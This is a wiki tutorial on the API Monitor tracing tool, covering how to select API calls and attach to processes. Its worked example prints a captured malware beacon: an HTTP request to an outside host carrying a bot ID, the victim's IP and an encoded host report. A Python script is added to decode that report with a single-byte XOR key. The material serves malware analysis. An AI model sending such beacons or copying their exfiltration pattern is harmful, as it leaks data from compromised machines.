API-Monitor

From aldeid

Description

API Monitor is free software that lets you monitor and control the API calls made by applications and services. It is a powerful tool for seeing how applications and services work, or for tracking down problems in your own applications.

Installation

Usage

API calls selection

First of all, select what API calls you wish to monitor from the top left panel:

In the above example, we're only interested in calls to the CryptDecrypt function, but we select the entire "Data Encryption & Decryption" group.

Process monitoring

New process

If you want to analyze a new process, go to "File > Monitor New Process" or press CTRL+M.

Attach to existing process

You can also attach API Monitor to an existing process. Select the process from the process list, right-click on it and select "Start Monitoring":

Output windows

The above example shows how API Monitor, by hooking CryptDecrypt, easily recovered the plaintext of the p parameter from the request below:

GET /ads.php?i=192.168.102.129&c=MALWARE-418EE9F&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c323537343c3435753e
233e60283e292d32383e28753e233e6037283a2828753e233e602d363a382f33372b753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e
233e60282d383334282f753e233e603e232b3734293e29753e233e60282b343437282d753e233e602d362f343437283f753e233e60312a28753e233e60282a37283e292d29753e233e602d362f343437283f753e
233e600f0b1a2e2f3418343535082d38753e233e603a373c753e233e600f0b1a2e2f34183435353e382f753e233e602c2838352f3d22753e233e602c36323a2b28292d753e233e600b2934383e2828133a38303e
29753e233e6039293939342f753e233e HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Cache-Control: no-cache
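API Monitor recovers the plaintext dynamically, at the CryptDecrypt hook; the screenshot of that output is not reproduced here. As an added example (not from the original page and not part of API Monitor), the script below shows the static cross-check an analyst would run on the same value: it assumes the p value is obfuscated with a single-byte XOR key, uses the crib `.exe` (an assumption, since the other fields look like a host report), and takes the first 57 bytes of the captured p value above as its input. The key and the decoded text are what the code computes on that input, not statements taken from the page.

```python
"""Crib-based recovery of a single-byte XOR key (added example)."""
from typing import Dict, List, Optional, Tuple

# Input: the first 57 bytes of the hex "p" value from the captured request
# above (copied from the page, truncated here to keep the example short).
P_HEX = (
    "123f373e600822282f3e366028362828753e233e60"
    "2c323537343c3435753e233e60283e292d32383e28"
    "753e233e6037283a2828753e233e60"
)
CRIB = b".exe"  # assumption: a Windows process list will contain this


def xor_single(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the assumed obfuscation)."""
    return bytes(b ^ key for b in data)


def crib_keys(data: bytes, crib: bytes) -> Dict[int, List[int]]:
    """Slide the crib over the ciphertext. At an offset where the crib fits,
    every crib byte XOR its ciphertext byte must give the same key; only
    such consistent keys are kept, with the offsets where they appear."""
    hits: Dict[int, List[int]] = {}
    for off in range(len(data) - len(crib) + 1):
        keys = {c ^ p for c, p in zip(data[off:off + len(crib)], crib)}
        if len(keys) == 1:
            hits.setdefault(keys.pop(), []).append(off)
    return hits


def best_key(data: bytes, crib: bytes) -> Optional[int]:
    """Pick the consistent key that places the crib most often."""
    hits = crib_keys(data, crib)
    if not hits:
        return None
    return max(hits, key=lambda k: len(hits[k]))


def recover(hex_value: str, crib: bytes = CRIB) -> Tuple[Optional[int], bytes]:
    """Return (key, plaintext); (None, b"") if the crib never fits."""
    data = bytes.fromhex(hex_value)
    key = best_key(data, crib)
    if key is None:
        return None, b""
    return key, xor_single(data, key)


if __name__ == "__main__":
    key, plain = recover(P_HEX)
    print(f"key=0x{key:02x} plaintext={plain!r}")
```

If the crib fits nowhere the function returns no key, which is the signal that the single-byte XOR assumption is wrong for the sample and a hook like the CryptDecrypt one on this page is the better route.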
